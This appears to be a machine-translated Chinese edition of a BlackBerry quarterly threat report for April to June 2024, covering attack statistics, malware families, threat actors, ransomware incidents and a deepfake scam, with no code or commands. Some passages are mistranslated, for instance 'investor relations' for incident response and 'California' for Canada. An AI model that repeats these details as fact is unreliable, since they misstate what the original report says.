重要的可操作情报
本报告全面回顾了全球威胁形势,重点是提供可操作的情报,客户可利用这些情报积极主动地保护其组织的安全。本报告涵盖的时间段为 2024 年 4 月至 6 月。报告亮点包括
独特的恶意软件和被阻止的攻击(被BlackBerry®网络安全解决方案阻止的未遂攻击)分别比上一报告期增长了53% 和18% 。BlackBerry ,平均每天捕获超过 11,500 个独特的恶意软件哈希值。
阅读《季度攻击》了解更多信息。
本季度,针对关键基础设施的攻击超过80 万次,其中50% 是针对金融部门的。
在 "关键基础设施"部分了解我们的网络威胁情报 (CTI) 团队的内部和外部调查结果。
在本轮攻击中,商业企业成为攻击的主要目标,在被阻止的攻击中,66%针对的是提供资本货物的公司。
有关这些威胁的更多信息,请参阅 "商业企业"部分。
在本报告所述期间,许多引人注目的犯罪集团(即勒索软件集团)非常活跃。这些团伙使用一系列复杂的工具来实现其目标。
在 "威胁行为者 "和 "工具"下阅读更多内容。
利用最新漏洞和新的或更新的恶意软件家族,网络威胁的漩涡不断涌现。
阅读我们的 "流行威胁 "部分,了解所有主要操作系统的趋势性威胁。
恶意信息窃取器(又称信息窃取器)是威胁行为者用来窃取有价值信息和凭证的重要武器。
请在CylanceMDR™观察部分阅读我们对渗出工具的看法。
我们的地缘政治分析认为,复杂网络威胁的增加凸显了加强网络安全教育的必要性。
了解BlackBerry 如何在其位于马来西亚的首个网络安全卓越中心 (CCoE) 投资网络教育。
目录
本期网络攻击总数
从 2024 年 4 月到 6 月,BlackBerry 网络安全解决方案阻止了 370 万次网络攻击。这意味着每天阻止的网络攻击超过4.35 万次,比 2024 年 1 月至 3 月的上一报告期增加了 18%。
此外,我们平均每天 观察到11,500 个 针对我们客户群的 独特 恶意软件样本 ,比上次报告 增加了 53%。这是自我们发布《全球威胁情报》报告以来季度间百分比增幅最高的季度之一。虽然更改二进制哈希值或生成独特的有效载荷对经验丰富的威胁行为者来说并不复杂,但 "攻击停止 "和 "独特哈希值 "的异常高数量却意义重大。这表明恶意软件开发者正在快速更新和调整代码,以提高恢复能力。原始数据表明,新的恶意软件正在进行调整,现有恶意软件家族的能力正在增强,对手正在迅速采用更先进的战术。这导致恶意软件通过增强混淆性、复杂性和规避技术而变得更加强大。
BlackBerry 随着网络犯罪开发者努力绕过网络安全系统,我们正在积极监控和识别恶意软件家族的修改。在本报告中,您将看到我们的威胁研究和情报团队的最新发现,了解目前有哪些团体在使用每种类型的恶意软件,并查看我们针对这些类型的威胁提出的战略性网络防御建议。
您会发现,攻击总数与独特 哈希值(新恶意软件)的数量并不一定相关。正如接下来几节中的图 2 至图 9 所示,并非每次网络攻击都使用独特的恶意软件。这取决于攻击者的动机、攻击的复杂性及其总体目标--如间谍活动、经济收益或对目标造成总体伤害。
按国家分列的网络攻击总数
停止攻击
美国使用BlackBerry 解决方案的组织在本轮攻击中受到的攻击次数最多。在美国之外,韩国、日本、澳大利亚和新西兰也遭受了大量攻击,使它们跻身前五名,并使亚太地区(APAC)成为遭受攻击第二多的地区。
在亚太地区,BlackBerry 的参与正在增加,地缘政治紧张局势继续影响着网络趋势。针对关键基础设施、供应链和企业的国家支持和非国家支持的网络攻击呈上升趋势。组织越来越多地成为网络间谍、窃听、勒索软件和网络钓鱼攻击等大量威胁的目标。为了提高供应链和组织的应变能力,他们应谨慎行事,提高警惕,以保护其基础设施、数据、设备和通信。
图 2 显示了BlackBerry 网络安全解决方案阻止网络攻击最多的前五个国家,以及收到恶意二进制文件最多的前五个国家。
独特的恶意软件
正如 "本期网络攻击总数 "部分所述,BlackBerry 平均每天观察到 11,500 次针对我们客户群的 新 哈希 (独特恶意软件),比上一份报告增长了 53%。这是自我们开始定期发布报告以来观察到的季度间最高百分比增长之一。导致独特恶意软件数量上升的因素很多。其一是宏观层面的针对性攻击增加,例如针对整个员工电子邮件列表发送有针对性的钓鱼电子邮件和公司特定诱饵,希望多名员工上当受骗。
如图 2 所示,美国、日本、韩国和澳大利亚与上一期报告一样,仍然位居榜首。如图 2 所示,美国、日本、韩国和澳大利亚与上一期报告中一样,仍然位居榜首。此外,加拿大现在是第五大独特恶意软件接收国。
结果比较
网络故事亮点:亚太地区的间谍活动
Transparent Tribe 利用跨平台编程语言瞄准印度政府、国防和航空航天部门
BlackBerry 研究人员在最新工作中发现了巴基斯坦高级持续威胁(APT)组织 "透明部落"(Transparent Tribe),该组织的目标是印度政府、国防和航空航天部门。该组织自 2013 年以来就以开展网络间谍活动而闻名,它使用 Python 和 Golang 等跨平台语言,并滥用 Telegram 和 Discord 等网络服务。最近的活动包括针对印度班加罗尔主要航空航天利益相关者的鱼叉式网络钓鱼电子邮件。尽管 Transparent Tribe 试图隐藏自己的来源,但其战术和工具都指向他们。
按行业分列的网络攻击
BlackBerry 已将其行业部门整合为两大类:关键基础设施和商业企业。BlackBerry关键基础设施遥测和统计数据来自网络安全和基础设施安全局(CISA)定义为关键基础设施的 16 个行业的客户。这些行业包括医疗保健、政府、能源、农业、金融和国防。商业企业中的商业实体从事商品和服务的生产、分销或销售。这些企业在制造业、零售业和服务业等多个领域开展业务。
关键基础设施
关键基础设施是网络犯罪分子有利可图的目标。这些数据通常价值很高,可以转卖给其他威胁组织,用于策划攻击,甚至用于间谍活动。针对关键基础设施的威胁分子可能会在攻击中使用勒索软件,因为组织可能宁愿支付赎金,也不愿花时间尝试从备份中恢复。对于提供医疗保健等关键服务的组织来说,时间是至关重要的,而威胁行为者也深知这一点。
今年,地缘政治动荡使关键基础设施成为反对其所在国或合作国政策的对手的目标。这经常促使威胁组织和国家支持者专门针对关键基础设施。
近年来,关键基础设施的数字化程度不断提高,使得该行业更容易受到网络犯罪分子的攻击。威胁者积极利用关键系统,攻击系统配置错误和未打补丁的遗留系统等漏洞,或试图通过针对员工的社会工程活动渗透系统。
在 2024 年 4 月至 6 月期间、 CylanceENDPOINT™和其他BlackBerry 网络安全解决方案阻止了超过80 万次针对关键基础设施行业组织的攻击。在这些攻击中,近一半是针对金融行业企业的,比上期增加了 10%,而政府和公共部门组织受到的攻击最为多样化,吸引了超过 45% 的独特哈希值。
此外,近一半(49%)的独特恶意软件哈希值以关键基础设施组织为目标,比上期增加了 17%,而BlackBerry 网络安全解决方案遇到的特定行业网络攻击中,41%是针对关键基础设施的。
-
关键基础设施:内部威胁
内部威胁是BlackBerry 在自己的客户群中识别和防范的威胁。外部威胁(将在下一节介绍)是指第三方报告的威胁,如行业新闻出版物、安全供应商或政府机构报告的威胁。
-
维达
类型偷窃者
目标:电信、医疗保健
地区拉丁美洲(LATAM)、北美
Vidar 是一种信息窃取程序,自 2018 年以来一直存在。Vidar 可能是曾经声名狼藉的信息窃取程序 Arkei 的分支,它一直非常活跃,经常通过恶意软件即服务(MaaS)在地下论坛上出售。该恶意软件非常灵活,可以通过多种方式投放到受害者的设备上,例如通过网络钓鱼文件、恶意广告(传播恶意软件的广告)以及通过其他恶意软件进行二次传播。2024 年早些时候,我们发现Vidar 还被用于攻击关键基础设施。在本报告所述期间,我们观察到 Vidar 主要攻击电信和医疗保健行业,尤其是在拉丁美洲和加勒比海国家,同时也观察到它以北美的医疗保健为目标。
-
烟雾装载机
类型下载器
目标:食品和农业、医疗保健
地区 拉美、北美
SmokeLoader 自 2011 年开始运行,是二级恶意有效载荷(包括各种木马、信息窃取程序甚至勒索软件)的主要交付机制。作为 MaaS 出售的 SmokeLoader 还可以获取用户凭据。由于它能够部署额外的恶意软件,因此受到一些知名威胁组织的青睐。2024 年 5 月,欧洲刑警组织协调开展了针对恶意下载者的 "终局行动"。执法部门摧毁或中断了 100 多个恶意软件服务器,查封了 2000 多个域名。尽管这些行动严重削弱了 SmokeLoader 背后的威胁组织的行动,但本季度在北美的医疗保健行业和拉美及加勒比海地区的食品和农业行业仍发现了与该恶意软件相关的二进制文件。
-
RisePro
类型偷窃者
目标:电信、食品和农业、医疗保健
地区拉美、北美
RisePro是一种多功能信息窃取器,通常在地下论坛上作为 MaaS 出售。最初发现 RisePro 是在 2022 年末。随后,在 2023 年底和 2024 年初,BlackBerry 发现RisePro 的活动急剧增加。
RisePro 信息窃取程序可以通过多种方式投放到受害者的设备上,通常是通过恶意链接或电子邮件附件。它还通过 PrivateLoader(一种按安装付费的恶意软件,通常被用作恶意软件分发服务)进行部署。
一旦进入受害者的设备,RisePro 就会与其命令与控制 (C2) 服务器通信,在那里接收指令以窃取数据、投放额外的恶意软件并从设备中流出信息。本季度,RisePro 被观察到以拉丁美洲和加勒比海国家的食品、农业和电信公司以及北美的医疗保健服务为目标。
-
GuLoader
类型下载器
目标:教育、交通、医疗保健、食品和农业
地区: 亚太地区、北美
GuLoader(又称 CloudEyE)是一款著名的下载程序,可传播其他恶意软件。自 2020 年以来,GuLoader 背后的威胁组织增加了反分析技术,使安全服务部门更难识别其攻击或制定应对措施。GuLoader 通常与其他恶意软件协同工作,即FormBook、Agent Tesla和Remcos 等信息窃取程序。
在本报告周期内,GuLoader 似乎主要针对北美的运输、食品和农业以及教育机构。不过,亚太地区国家的运输公司也发现了 GuLoader 二进制程序。
-
露玛窃贼
类型偷窃者
目标:粮食和农业、能源、金融
地区 亚太地区、拉丁美洲和加勒比海地区、北美
Lumma Stealer(又名 LummaC2)是一种基于 C 语言的信息窃取程序,它已连续两个报告期以拉丁美洲和加勒比海地区的食品和农业公司以及亚太地区的能源行业为目标。Lumma Stealer 是一种 MaaS,专门外泄登录凭证和银行详细信息等敏感数据,以实施银行欺诈。此外,Lumma Stealer 还以北美和亚太地区的金融服务公司为目标。
网络故事亮点:关键基础设施面临的威胁
SideWinder 利用新的配送基础设施瞄准地中海的港口和海事设施
2024 年 7 月,BlackBerry 威胁研究和情报小组发现了一个名为 SideWinder 的威胁组织的新活动。SideWinder 组织又称 "剃刀虎"、"响尾蛇 "和 T-APT-04,至少从 2012 年起就开始活跃。据观察,该组织曾以军事、政府和商业实体为目标,尤其关注巴基斯坦、阿富汗、中国和尼泊尔。SideWinder 通常使用电子邮件鱼叉式网络钓鱼、文档利用和 DLL 侧载技术来躲避检测并进行有针对性的植入。
在这次行动中,BlackBerry 观察到三个伪造的 "视觉诱饵 "文件与非常具体的端口基础设施有关。视觉诱饵本身通常没有恶意;其主要目的是分散受害者的注意力,使其意识不到自己已被入侵。受害者通常是目标公司的员工。以下是 SideWinder 最新活动中的一个示例:
威胁者使用各种伎俩诱使受害者打开并阅读视觉诱饵文件:
- 攻击者复制合法组织的真实徽标,而接收者很可能因为工作或行业关系而熟悉该组织。在上文图 7 中,视觉诱饵文件滥用了埃及红海港务局(合法)的徽标。
- 设计文件标题的目的是让收件人产生最大程度的焦虑。上面例子中的标题("雇员解雇和减薪通知")就是为了让雇员担心自己的工作和财务安全。
- 在上面的示例中,请注意文件正文中 "耗尽了我们大部分的财务储备"、"严重关切"和 "终止雇佣关系"等充满感情色彩的短语。这些短语的格式为粗体,以便读者一眼就能看出来。
威胁行为者希望通过使用熟悉的公司徽标和激发强烈的情绪(如恐惧或对工作安全的担忧),让受害者相信文件是合法的,并在高度焦虑的状态下被迫阅读文件。这样,他们就会分心,以至于不会注意到设备上出现的奇怪事件,如系统弹出窗口或因 CPU 使用率高而导致风扇噪音增大,而这通常是恶意软件感染正在进行的早期预警信号。
通过分析研究过程中发现的数据,我们得出中等可信度的结论,即 SideWinder 的新活动以印度洋和地中海的港口和海事设施为目标。根据 SideWinder之前的活动,我们认为这次新活动的目标是间谍和情报收集。阅读BlackBerry 博客中的完整报道。
关键基础设施:外部威胁
BlackBerry 此外,BlackBerry,还密切跟踪外部威胁,或外部组织报告的、但不一定在 的租户中发现的威胁。在此期间,外部组织--政府机构、行业新闻组织和其他组织--报告了全球范围内针对关键基础设施的大量攻击。
3 月的最后几天,有消息称印度多个政府机构和能源部门实体感染了免费提供的信息窃取程序HackBrowserData 的定制变种。这个未知的威胁行为者利用钓鱼邮件作为感染载体,利用 Slack 频道作为外渗渠道,窃取了 8.8 GB 的敏感数据,包括员工详细信息和财务记录。
今年4 月,总部位于得克萨斯州的电信公司 Frontier Communications 向美国证券交易委员会(SEC)报告称,该公司于 4 月 14 日检测到一个漏洞,不得不关闭部分系统进行恢复。不明威胁行为者能够访问敏感数据,包括个人身份信息。
同样在4 月份,乌克兰计算机应急小组(CERT-UA)报告了据称由俄罗斯支持的 "沙虫"组织攻击这个饱受战争蹂躏的国家内各种关键基础设施实体的计划。该计划针对约 20 个实体,涉及包括水和能源在内的多个关键基础设施部门。由于俄罗斯和乌克兰之间的战争仍在继续,"沙虫 "长期以来对乌克兰关键基础设施的攻击很可能会持续下去。
五月的第一周,美国多个机构与英国国家网络安全中心和加拿大网络安全中心(CCCS)合作,就来自亲俄罗斯分子的持续黑客威胁发布了联合公告。黑客攻击的目标是与互联网连接的关键基础设施,包括水、能源、水坝和农业。他们的活动重点是欧洲和北美关键基础设施部门面向互联网的操作技术 (OT) 系统。
5 月初,BlackBasta勒索软件运营商将目标锁定在一家大型非营利天主教医疗服务提供商,该公司在美国 18 个州拥有约 140 家医院。随后,在6 月初,BlackBasta 从马里兰州的生物技术公司 Elutia 窃取了 550 GB 的数据。这些数据包括员工和财务信息。
BlackBasta 并不是唯一一个以医疗保健为目标的勒索软件团伙。6 月底,BlackSuit 勒索软件团伙入侵了南非国家卫生实验室服务(NHLS)及其 265 个实验室。BlackSuit 被认为是具有侵略性和危险性的 Conti 勒索软件团伙的衍生产品。BlackSuit 入侵事件恰逢猴痘(mpox)爆发,对 NHLS 系统造成了严重影响。威胁方删除了 NHLS 系统的部分内容,包括备份,但没有报告丢失敏感的患者数据。
这些攻击以及上一季度的其他攻击表明,针对关键基础设施(尤其是医疗保健行业)的勒索软件运营商仍然是一个长期存在的问题。
商业企业
在本报告所述期间,针对商业企业的内部威胁也显著增加。BlackBerry 网络安全系统阻止的攻击次数(110 万次)比上一份报告增加了 60%。
在商业企业部门,我们注意到针对资本货物部门的攻击显著增加。与消费品不同,资本货物包括对整个商业企业和关键基础设施的各行各业至关重要的机械、工具和设备。针对这些资产的攻击会影响企业的数字和物理供应链。
-
商业企业:内部威胁
内部威胁是BlackBerry 在自己的客户群中识别和防范的威胁。外部威胁(将在下一节介绍)是指第三方报告的威胁,如行业新闻出版物、安全供应商或政府机构报告的威胁。
-
阿马代
类型机器人/偷窃者
目标:制造业、商业服务、资本货物
地区:欧洲、中东和非洲 (EMEA)、亚太地区、拉丁美洲和加勒比海 (LATAM)
Amadey 首次出现于 2018 年,是一种模块化恶意软件,目前仍活跃在威胁领域。通过迭代变化,它在通信方面的最新进展使其保持了相关性。Amadey 可以收集情报并对受害者机器进行轮询,然后将数据外流到其 C2。它经常被用作僵尸网络来大规模传播其他恶意软件,并经常协助部署信息窃取程序和恶意加密程序。
在本报告所述期间,阿玛迪斯的目标市场是欧洲、中东和非洲地区、亚太地区以及拉丁美洲和加勒比地区的制造业和商业服务业,特别是拉丁美洲和加勒比地区的资本货物服务业。
-
私有加载器
类型下载器
目标:制造业、商业服务业
地区亚太地区、拉丁美洲和加勒比海地区、北美
PrivateLoader 是一种广泛存在的恶意软件传播者,它提供按安装付费的恶意软件传播服务。PrivateLoader 通常通过托管 "破解 "软件的虚假网站传播,可以下载各种恶意有效载荷,包括 RisePro 等各种信息窃取程序。PrivateLoader 使用一种被称为 SEO 中毒的技术来提高其虚假网站的知名度。这种技术欺骗用户,让他们认为搜索结果的前几位是最可信的,当人们没有仔细查看搜索结果时,这种技术就会非常有效。在本报告所述期间,PrivateLoader 将目标锁定为北美的制造业以及拉丁美洲和加勒比以及亚太地区的商业服务业。
-
特斯拉特工
类型远程访问木马
目标:制造业、食品零售业、商业服务业
地区亚太地区、拉丁美洲和加勒比海地区、北美
Agent Tesla 是一个著名的远程访问木马(RAT),专门从事信息窃取,自 2014 年以来一直以使用基于 Microsoft Windows 操作系统的用户为攻击目标。这种商业恶意软件通过地下论坛销售,并作为 MaaS 产品进行推广,以窃取敏感数据和凭证、记录键盘输入和捕获受害者屏幕截图而著称。它经常被用于网络钓鱼活动,并作为木马破解软件托管/分发。
本轮特斯拉特工的目标行业包括亚太地区、拉丁美洲和加勒比以及北美国家的制造业、食品零售业和商业服务业。
-
RisePro
类型偷窃者
目标:商业服务、资本货物
地区:亚太地区
RisePro是一种多功能信息窃取器,通常在地下论坛上作为 MaaS 出售。最初发现 RisePro 是在 2022 年末。随后,在 2023 年底和 2024 年初,BlackBerry 发现RisePro 的活动急剧增加。RisePro 可以通过多种方式投放到受害者的设备上,通常是通过恶意链接或电子邮件附件。它还通过 PrivateLoader 进行部署,这是一种 PPI 恶意软件,经常被用作恶意软件分发服务。一旦进入设备,RisePro 就会与其 C2 服务器通信,并在那里接收指令以窃取数据、投放其他恶意软件或从受害者设备中窃取信息。
商业企业:外部威胁
4 月初,IxMetro PowerHost 遭受了相对较新的 SEXi 勒索软件团伙的网络攻击,据称该团伙使用了泄露的 LockBit 3.0 源代码。该团伙以该组织的 VMware ESXi 服务器和备份为目标,严重破坏了 IxMetro PowerHost 在智利的服务。
同样在4 月份,中国购物平台Pandabuy 遭到入侵,130 多万客户的数据在网上泄露。Pandabuy 允许用户从其他中国电子商务平台购买产品。一个名为 "Sanggiero "的威胁行为者声称对此次攻击负责,称他们利用了该平台 API 中的关键服务器漏洞和其他漏洞,获取了该零售商内部服务的访问权限。该电商零售商最初被怀疑支付了一笔要求防止数据泄露的费用。然而,2024 年6 月,同一威胁行为者声称再次利用并勒索了该中国平台。
5 月初,一家大型跨国技术公司向客户发出警报,称发生了大规模数据泄露事件,近 5000 万人受到影响。虽然该技术公司证实没有财务信息被泄露,但其他个人身份信息(PII)却被曝光,包括客户姓名和实际地址。尽管如此,由于被盗数据的非财务性质,该技术公司还是公开淡化了此次外泄事件的潜在影响。
今年迄今为止最大的数据泄露事件之一发生在5 月份,当时威胁组织ShinyHunters 入侵了一家跨国娱乐票务销售和分销公司,窃取了超过 5.6 亿客户的数据。这些数据包括姓名、地址和电子邮件等 PII 以及散列的信用卡详细信息。受影响的用户已收到邮件通知。
今年6 月,一家美国跨国软件公司因遭受勒索软件攻击而发生大面积故障,数千家北美汽车经销商的业务受到影响。这次中断影响了 15,000 多家汽车经销商的所有活动,包括汽车销售和维修。勒索软件组织 BlackSuit 声称对此次攻击负责,并索要近 2500 万美元的加密货币作为赎金。据称,该组织支付赎金是为了恢复其系统。
6 月底,总部位于北美的软件服务公司 TeamViewer 证实,多产的 APT 组织 Cozy Bear(又名APT29)攻击了他们的企业 IT 系统。Cozy Bear 是一个总部设在俄罗斯的黑客组织,据称隶属于俄罗斯对外情报局。该组织多年来实施了多次攻击和漏洞利用,包括 2020 年的 SolarWinds 入侵事件。TeamViewer 发布声明称,只有员工账户数据被泄露,他们没有发现 Cozy Bear 访问生产环境或客户数据的证据。
网络故事亮点:针对商业企业的深度伪造
员工警惕:防范 Deepfake 骗局的第一道防线
深度伪造照片、视频和 "深度声音 "音频正在成为网络安全领域日益严重的问题。深度伪造是利用生成式人工智能(AI)创建的数字操纵媒体,最常见的使用案例是 "换脸"--将一个人的脸叠加到另一个人的脸上。深度伪造媒体通常高度逼真、令人信服,可被不良行为者用于各种攻击,包括网络钓鱼诈骗、虚假电话,甚至是虚假视频电话,目的是让接收者以为他们收到了其他员工(如老板)的合法请求。
自从 Reddit 用户在 2017 年底推出第一个用于创建深度伪造的应用程序以来,深度伪造以闪电般的速度发展,在诱骗员工向攻击者提供登录凭据、财务或客户记录,甚至将数百万美元的公司资金汇给骗子方面,已经变得非常有效。
在最近发生的一起事件中,汽车制造商法拉利躲过了一场代价高昂的深度伪造骗局。一位高管接到了冒充首席执行官 Benedetto Vigna 的可疑电话。骗子的口音和语气与真正的首席执行官几乎一模一样,但这位高管注意到了一些可疑之处,比如使用了一个陌生的电话号码,以及信息中声称的紧迫性。
为了核实来电者的身份,这位高管问了一个关于书籍推荐的具体问题--只有真正的首席执行官才知道这个细节。当骗子无法回答时,他们挂断了电话。这位高管的快速思维避免了一场潜在的灾难,并促使法拉利启动了内部调查,以确保通信安全。
这一事件凸显了员工在保护公司免受欺诈方面发挥的重要作用。几乎所有 deepfake 攻击的一个重要组成部分都是社交工程;威胁实施者假定员工是公司安全边界中最薄弱的环节,并使用心理操纵技术来获取目标的信任。对于那些对异常请求保持警惕和怀疑的员工,尤其是那些涉及转账或敏感信息的请求,我们要为他们点赞。他们的警觉和快速行动可以使公司避免重大经济损失和声誉损害。
公司可以通过教育员工,让他们认识到在 "虚假 "电话/视频通话、电子邮件或短信背后可能隐藏着骗子的红旗,从而提高公司的安全性。您可以从赞美和支持这些无名英雄开始,他们每天都在保护您的组织免受复杂的威胁。与同事分享这则轶事。提醒他们,如果怀疑事情不对,要相信自己的直觉,并找到第二种方法来验证请求者的身份。
要了解有关深度伪造的更多信息,请阅读我们的白皮书、 揭开深度伪造的面纱:这一日益严重的威胁背后的技术和技巧.
地缘政治分析与评论
世界各国政府越来越清楚地认识到,技术是地缘政治竞争的驱动力。2024 年 5 月 6 日,美国国务卿安东尼-布林肯(Antony J. Blinken)在加利福尼亚州旧金山举行的 RSA 大会上发表讲话,描述了一个零和竞争的世界,各国将被迫采用西方或中国的技术堆栈。布林肯国务卿的网络空间和数字政策大使纳撒尼尔-C-菲克(Nathaniel C. Fick)更是一针见血地指出:"国际秩序将由谁的隐喻操作系统主导来定义。
生成式人工智能等技术正以前所未有的速度向前发展,这引发了呼吁 "负责任地 "使用先进数字技术的大量活动。虽然人工智能等技术在推动经济增长、改变社会和解决世界上一些最棘手的问题(如气候变化、不平等和疾病)方面具有巨大的潜力,但它们也会带来影响巨大的风险,特别是当这些风险体现在人们日常依赖的关键基础设施或服务上时。
正如本报告所强调的,网络犯罪分子--包括国家支持的团体--越来越多地瞄准关键基础设施。在过去几年中,恶意或犯罪意图破坏服务或勒索关键基础设施运营商和所有者赎金的事件在全球范围内激增。在本报告所述期间,BlackBerry ,记录了超过 80 万次针对关键基础设施的攻击,其中 50%是针对金融部门的。犯罪者意识到这些服务的关键性,并试图通过最大限度地破坏或威胁破坏这些服务来最大限度地勒索赎金。
奥运会和国际足联世界杯等大型国际体育赛事也已成为网络威胁的焦点。由于预计恶意网络活动会急剧增加,加拿大网络安全中心于 2024 年 5 月发布了一份网络威胁公告,评估称 "网络犯罪分子很可能会通过商业电子邮件泄露和勒索软件攻击,将目标锁定在与大型国际体育赛事相关的大型组织以及大型体育赛事周边的本地企业"。"它还警告与会者和观众警惕利用这些赛事作为攻击诱饵的钓鱼电子邮件和恶意网站。
事实上,在奥运会结束后,法国当局报告了 140 多起与 2024 年奥运会有关的网络攻击,所有攻击都被定性为 "低影响"。然而,从往届奥运会的趋势来看,这个数字很可能被大大低估了。例如,在 2021 年东京奥运会期间,组织者报告了 4.5 亿次网络攻击。
世界经济论坛(WEF)在其《2024 年全球网络安全展望》中指出,政府和企业都在努力维持网络复原力,以应对迅速升级和日益复杂的网络威胁,这些威胁可能会造成大规模破坏。此外,各组织的自我保护能力也存在巨大差异。世界经济论坛指出,在拥有 10 万或以上员工的组织中,85% 的组织拥有网络保险,而在员工人数少于 250 人的组织中,只有不到 21% 的组织拥有网络保险。总而言之,规模最小的组织 "表示缺乏满足最低关键运营要求所需的网络复原力的可能性是规模最大的组织的两倍多"。大型组织和小型组织之间的这种不平衡需要得到解决。
虽然网络技术的可负担性已被强调为一个关键因素,但教育和网络意识也是如此。因此,除了提供便捷的安全解决方案,BlackBerry 还投资于网络教育。2024 年 3 月,BlackBerry 在马来西亚成立了首个网络安全卓越中心(CCoE)。CCoE 将提供卓越的网络安全培训和威胁情报,帮助马来西亚和印度洋-太平洋地区的合作伙伴政府和组织更好地预防、阻止和应对他们所面临的网络威胁。
要提高网络安全标准,弥补全球近 400 万训练有素的网络专业人员的短缺,还需要做更多的工作。随着越来越多的组织和行业依赖于数字和云技术,他们对稳健、多方面的网络安全方法的需求变得至关重要。
执法风采
增强执法能力:NC3的专业支持
国家网络犯罪协调中心(NC3)成立于 2020 年,是对加拿大 2018 年国家网络安全战略的回应。在加拿大皇家骑警的管理下,这个国家警察部门的任务是帮助减少网络犯罪在加拿大造成的威胁、影响和伤害。它为加拿大所有警察部门提供专门支持,并同时雇用具有不同技能组合的警察和文职人员,以提供有效分析复杂犯罪所需的调查和技术专业知识。NC3 为支持执法合作伙伴提供专门服务,例如:
- 网络犯罪情报
- 技术咨询和指导
- 工具开发
- 行为分析
- 加密货币追踪
NC3 与国内和国际执法部门、政府合作伙伴、私营企业和学术界密切合作,不断改进加拿大执法部门应对网络犯罪的措施。
勒索软件的流行
加拿大的顶级勒索软件威胁
NC3 定期进行评估,以确定加拿大最主要的勒索软件威胁。最近一次评估涵盖了 2024 年 1 月 1 日至 2024 年 4 月 30 日期间发生的事件。下图列出了这一时期的十大勒索软件威胁。
尽管勒索软件猖獗,但大多数网络犯罪都没有报案。据估计,只有约 10% 的网络犯罪向加拿大执法部门报告。这种报告不足的情况使得全面了解网络犯罪在加拿大的流行程度和影响变得十分困难。
报告不足的犯罪
网络故事集锦:勒索软件上天
Akira 勒索软件的目标是拉美航空业
2024 年 6 月,BlackBerry 研究人员调查了 Storm-1567 使用 Akira 勒索软件对一家拉美航空公司发动的攻击。这个以双重勒索策略著称的金融犯罪团伙最初通过 SSH 访问网络,并在部署 Akira 之前窃取了重要数据。Storm-1567 以利用过时系统和滥用合法软件而著称,它以全球中小企业为目标,截至 2024 年 1 月,共攻击了 250 多家组织,勒索了超过 4200 万美元的赎金。
事件响应分析和评论
BlackBerry 事件响应 (IR) 小组定期监控以连接互联网的设备为初始感染媒介的事件。针对易受攻击设备的网络攻击很常见,例如配置错误的设备或出厂时设置了密码的设备。工作过度的企业安全团队往往无法充分保护所有互联网设备(如网络打印机和笔记本电脑网络摄像头)的安全。此外,越来越多的关键功能被嵌入到设备中,如网络和防火墙设备。
本季度,投资者关系团队在过时版本的思科自适应安全设备(ASA)和装有 Palo Alto Networks PAN-OS 软件的设备中发现了漏洞。未受保护或配置不佳的互联网设备可让网络窃贼在公司环境中部署勒索软件,并外泄数据。这凸显了公司对所有暴露在互联网上的系统进行安全更新并及时更新的必要性。(MITRE - 外部远程服务)
该小组观察到几起未经授权的行为者能够访问公司云资源的事件。下文详述的最近两起事件突出说明了定期系统更新和强大网络安全措施的重要性。
- 事件 1:在一次网络安全漏洞事件中,威胁分子利用过时的 Cisco ASA 上的一系列漏洞,在未经授权的情况下访问了公司的虚拟专用网络 (VPN)。进入网络后,他们利用 Microsoft 远程桌面协议 (RDP) 潜入域控制器,从而获取了域内用户和组的完整列表。利用 netscan 和高级 IP 扫描仪软件等工具,威胁者进行了彻底的网络扫描,以绘制基础设施地图。随后,攻击者渗出了包含关键用户数据的整个 "C:\Users "文件夹,然后部署了 Akira 勒索软件,造成了严重的破坏和数据丢失。
- 事件 2:某客户收到来自其域控制器的令人震惊的安全警报,表明存在未经授权的访问。调查显示,威胁行为者利用了过时、报废的 Cisco ASA 设备中的漏洞来渗透网络。进入网络后,攻击者部署了 BlackSuit 勒索软件,严重破坏了客户的运营。
这些事件凸显了公司在所有系统上实施强大身份验证安全控制的必要性。(MITRE--有效账户:云账户)
网络故事精选:大规模数据泄露暴露 29 亿条记录
美国、英国和加拿大公民的四兆兆字节个人数据被盗。
今年 4 月,臭名昭著的地下网络犯罪网站 BreachForums 上发布了一条销售帖子,内容涉及 "美国、加利福尼亚州和英国全部人口 "的个人记录疑似泄露。该帖子声称有4 TB 的数据被盗,其中包括高度敏感的 PII,如美国公民以及英国和加拿大人的全名、邮寄地址、电话号码甚至社会安全号(SSN)。
名为 USDoD 的威胁行为者声称窃取了超过 29 亿行记录,并要求为这一大型数据集中的泄漏信息支付 350 万美元的巨额费用。
这一赎金要求最终被证明是不成功的,7 月份,4 TB 的数据通过 BreachForums 免费发布。其中包括超过 1.37 亿个电子邮件地址、2.72 亿个 SSN 等。据信,泄露的原因与 RecordsCheck.net 有关,该网站是数据经纪商和背景调查服务公司 National Public Data (NPD) 的一个附属网站,无意中将其后端数据库的密码发布在一个明文文件中,该文件可从其主页上免费获取--这一关键的安全疏忽最终被威胁行为者发现并利用。
在一份正式声明中,NPD 承认有人在 2023 年底试图访问他们的记录;但他们没有提及可能受到影响的记录范围。
虽然这些数据最近才被泄露,但其本身却跨越了数十年,这意味着受此次泄露影响的一部分受害者可能已经去世,而且泄露的一些数据很可能已经过时。还需要注意的是,一个人可能有许多不同的记录,每条记录都与该人以前的地址和姓名有关。这意味着受此次泄密事件影响的人数可能远低于之前媒体错误宣称的 30 亿人。
然而,鉴于 PII 数据量之大,它已成为美国有史以来最大的数据泄露记录之一,应引起所有美国受害者的关注。在接下来的几个月里,随着这次灾难的余波逐渐平息,这些被盗数据极有可能被许多其他威胁行为者利用并作为武器。因此,所有公民都应积极监控自己的信用报告,防止欺诈活动,并在发现欺诈活动时向征信机构报告。
-
威胁行为者和工具
除了我们在内部调查和发现中提到的威胁行为者之外,本季度还有其他几个团体发起了各种网络攻击。这些组织通常使用一系列工具和恶意软件来实施非法活动。在此,我们重点介绍我们的威胁研究和情报团队在本季度发现的一些最具影响力的攻击者和著名工具。
-
黑衣人
BlackSuit 是 2023 年 4 月出现的一个私人勒索软件行动。该组织采用多方面的勒索策略,既涉及受害者数据的外流,也涉及数据的加密。他们还维护暗网数据泄露网站,公开发布从违规受害者处窃取的机密数据。BlackSuit 以各行各业各种规模的组织为目标,包括医疗保健、教育、信息技术 (IT)、政府、零售和制造业。
